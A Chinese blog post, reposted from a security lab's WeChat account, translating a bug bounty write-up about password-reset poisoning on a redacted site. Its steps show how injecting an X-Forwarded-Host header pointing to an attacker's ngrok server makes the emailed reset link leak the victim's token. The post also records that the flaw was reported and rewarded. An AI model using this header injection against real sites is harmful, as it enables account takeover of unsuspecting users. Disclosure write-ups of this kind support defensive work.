前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >一种有趣的帐户接管手段

一种有趣的帐户接管手段

作者头像
Ms08067安全实验室
发布2020-01-02 11:20:57
4610
发布2020-01-02 11:20:57
举报
大家好,我是Vishal Bharad,是一名机械工程师,同时也是渗透测试员,在这篇文章中我将分享一次有趣的接管他人帐户的过程。

关于漏洞

关于获取他人帐户的控制权,我曾在网上学习了不少前辈的经验和技巧,而在花费了6到8个小时后,我在目标站redacted.com的忘记密码页面中找到了一些可利用的痕迹,并最终找到了一个可接管他人帐户的漏洞。

工具

  1. BurpSuite
  2. Ngrok服务器

重现

1.我在[https://redacted.com/users/forgot_password](https://redacted.com/users/forgot_password)页面输入用户名,然后获取和重置密码有关的请求信息。

2.用Burpsuite拦截相关请求,并往其中添加请求头X-Forwarded-Host: bing.com

3.很快你就能收到找回密码的电子邮件,其中含有重置密码链接:[https://bing.com/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES](https://bing.com/users/reset_password/tqo4Xciu806oiR1FjX8RtIUc1DTcm1B5Kqb53j1fLEkzMW2GPgCpuEODDStpRaES)

是的,可以看到重设密码的链接居然在域名bing.com 后。现在我们用[https://redacted.com](https://redacted.com)替换[https://bing.com](https://bing.com),然后在浏览器中打开。

4.很好,这个重置密码链接有效,可以重置密码。

展开攻击

1.我先通过ngork创建属于我的服务器,也就是攻击者服务器。

2.转到[https://redacted.com/users/forgot_password](https://redacted.com/users/forgot_password)页面,输入目标的用户名,并用Burpsuite捕捉请求。

3.在捕获的请求中,攻击者添加请求头X-Forwarded-Host: xxxxxx.ngrok.io,其中ngrok.io等于ngork服务器地址。

4.此刻,受害者得到密码重置URL中的域是ngrok服务器地址

5.只要受害者点击该链接,攻击者就可以直接看到完整的重置密码的令牌。

6.当攻击者可以获得密码重置令牌时,他就可以直接接管目标帐户!

时间流

1.我在8月1日向他们报告了漏洞

2.厂商确认了报告、复制步骤和PoC(屏幕截图、视频)

3.他们给了我3位数的奖金(700-1000美元)

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-12-24,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Ms08067安全实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 关于漏洞
  • 工具
  • 重现
  • 展开攻击
  • 时间流
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档